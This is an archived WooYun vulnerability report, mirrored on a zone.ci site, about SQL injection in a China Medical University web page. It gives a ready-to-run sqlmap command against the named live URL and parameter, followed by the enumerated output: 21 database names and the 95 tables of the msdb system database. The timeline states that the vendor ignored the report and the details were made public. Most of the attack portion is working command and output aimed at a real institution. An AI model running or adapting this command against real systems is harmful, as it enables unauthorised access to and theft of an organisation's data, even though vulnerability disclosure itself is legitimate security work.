乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-18: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经主动忽略漏洞,细节向公众公开
高校安全之中国医科大学SQL注射
sqlmap.py -u "http://etc.cmu.edu.cn/ylx/lianxi_x.asp?zid=1" --dbs
available databases [21]:[*] bbs[*] chengji[*] master[*] model[*] msdb[*] pictest[*] picture[*] QandA[*] tempdb[*] test1[*] yaolibbs[*] yaolijp[*] yx_baoming[*] zjxt[*] 备份[*] 护理资源共享课[*] 药学院_临床药学实验教学中心[*] 药学院平台[*] 药理学精品共享课[*] 辽宁培训学院[*] 辽宁继续教育学院Database: msdb[95 tables]+-------------------------------------+| MSdatatype_mappings || MSdbms_datatype_mapping || MSdbms_datatype_mapping || MSdbms_datatype_mapping || MSdbms_map || backupfilegroup || backupfilegroup || backupmediafamily || backupmediaset || backupset || log_shipping_monitor_alert || log_shipping_monitor_error_detail || log_shipping_monitor_history_detail || log_shipping_monitor_primary || log_shipping_monitor_secondary || log_shipping_primaries || log_shipping_primary_databases || log_shipping_primary_secondaries || log_shipping_secondaries || log_shipping_secondary_databases || log_shipping_secondary_databases || logmarkhistory || restorefilegroup || restorefilegroup || restorehistory || sqlagent_info || suspect_pages || sysalerts || syscachedcredentials || syscategories || sysdac_history_internal || sysdac_instances_internal || sysdac_instances_internal || sysdatatypemappings || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdbmaintplans || sysdownloadlist || sysdtscategories || sysdtslog90 || sysdtspackagefolders90 || sysdtspackagelog || sysdtspackages90 || sysdtspackages90 || sysdtssteplog || sysdtstasklog || sysjobactivity || sysjobhistory || sysjobs_view || sysjobs_view || sysjobschedules || sysjobservers || sysjobstepslogs || sysjobstepslogs || sysmail_account || sysmail_allitems || sysmail_attachments_transfer || sysmail_attachments_transfer || sysmail_configuration || sysmail_event_log || sysmail_faileditems || sysmail_log || sysmail_mailattachments || sysmail_mailitems || sysmail_principalprofile || sysmail_profileaccount || sysmail_profileaccount || sysmail_query_transfer || sysmail_send_retries || sysmail_sentitems || sysmail_server || sysmail_servertype || sysmail_unsentitems || sysmaintplan_logdetail || sysmaintplan_logdetail || sysmaintplan_plans || sysmaintplan_subplans || sysnotifications || sysoperators || sysoriginatingservers_view || sysoriginatingservers_view || sysproxies || sysproxylogin || sysproxyloginsubsystem_view || sysproxysubsystem || sysschedules_localserver_view || sysschedules_localserver_view || syssessions || syssubsystems || systargetservergroupmembers || systargetservergroups || systargetservers_view || systargetservers_view || systaskids |+-------------------------------------+
综上
你们懂
危害等级:无影响厂商忽略
忽略时间:2015-09-23 00:10
暂无